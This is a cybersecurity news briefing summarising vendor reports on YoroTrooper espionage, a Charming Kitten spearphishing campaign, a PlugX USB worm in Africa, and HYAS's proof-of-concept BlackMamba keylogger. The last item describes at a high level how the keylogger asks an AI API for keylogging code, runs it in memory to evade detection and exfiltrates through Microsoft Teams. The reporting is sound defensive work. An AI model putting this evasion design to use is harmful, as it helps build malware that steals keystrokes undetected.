At a glance.
- YoroTrooper targets CIS countries.
- Charming Kitten spearphishing campaign.
- PlugX campaign expands to Africa.
- AI used to generate polymorphic keylogger.
YoroTrooper targets CIS countries.
Cisco Talos is tracking a new threat actor the company calls "YoroTrooper," which has been conducting cyberespionage campaigns against Europe and CIS countries since at least June 2022. The threat actor primarily targets "government or energy organizations in Azerbaijan, Tajikistan, Kyrgyzstan and other Commonwealth of Independent States (CIS)." The threat actor has successfully compromised embassies of Azerbaijan and Turkmenistan, as well as accounts belonging to a "critical European Union (EU) health care agency and the World Intellectual Property Organization (WIPO)." YoroTrooper uses phishing emails with malicious attachments to distribute a variety of commodity Trojans.
The researchers believe the threat actor speaks Russian, but they don't attribute the group to any particular nation-state.
Charming Kitten spearphishing campaign.
Secureworks describes a spearphishing campaign that's targeting researchers who are documenting the oppression of women in Iran. The researchers believe the campaign is being run by the Iranian government APT COBALT ILLUSION (also known as Charming Kitten, APT42, or Phosphorous), a threat actor that frequently targets "academics, journalists, human rights defenders, political activists, intergovernmental organizations (IGOs), and non-governmental organizations (NGOs) that focus on Iran." In this case, the threat actor is impersonating a researcher working with the Atlantic Council think tank, using a phony Twitter account to message several people working on Middle Eastern political affairs research.
PlugX campaign expands to Africa.
Sophos is tracking a new version of the PlugX USB Trojan. The researchers say the “novel aspects of this variant are a new payload and callbacks to a C2 server previously thought to be only tenuously related to this worm.” PlugX is a known malware variant that can spread via USB sticks, which can sometimes allow it to access air-gapped systems. The malware is currently spreading in African countries, with infections observed in Ghana, Zimbabwe, and Nigeria. The new variant was also observed in Papua New Guinea and Mongolia. Sophos believes this campaign is linked to the Chinese APT Mustang Panda, which has been known to use the malware in the past.
Gabor Szappanos, threat research director at Sophos, stated:
“Back in November 2022, we reported on a different cluster of active adversary activity targeting government organizations in Southeast Asia that was also taking advantage of this ‘retro’ method of spreading via USB drives. This worm then appeared thousands of miles away in Africa a month later. Now, this latest cluster of USB worm activity is hopping across three different continents. We don’t typically think of removable media as being particularly ‘mobile,’ especially when compared to internet-based attacks, but this method of dispersion has proved to be highly effective in this part of the world.
AI used to generate polymorphic keylogger.
Researchers at HYAS have developed a proof-of-concept strain of polymorphic malware that uses OpenAI’s API to evade detection. The malware, which the researchers call “BlackMamba,” is a keylogger delivered as an apparently benign executable. Once executed, however, BlackMamba will reach out to OpenAI and request that the AI generate keylogging code: “It then executes the dynamically generated code within the context of the benign program using Python’s exec() function, with the malicious polymorphic portion remaining totally in-memory. Every time BlackMamba executes, it re-synthesizes its keylogging capability, making the malicious component of this malware truly polymorphic. BlackMamba was tested against an industry leading EDR which will remain nameless, many times, resulting in zero alerts or detections.” The researchers can then exfiltrate the captured data via legitimate communication and collaboration tools (in this case Microsoft Teams).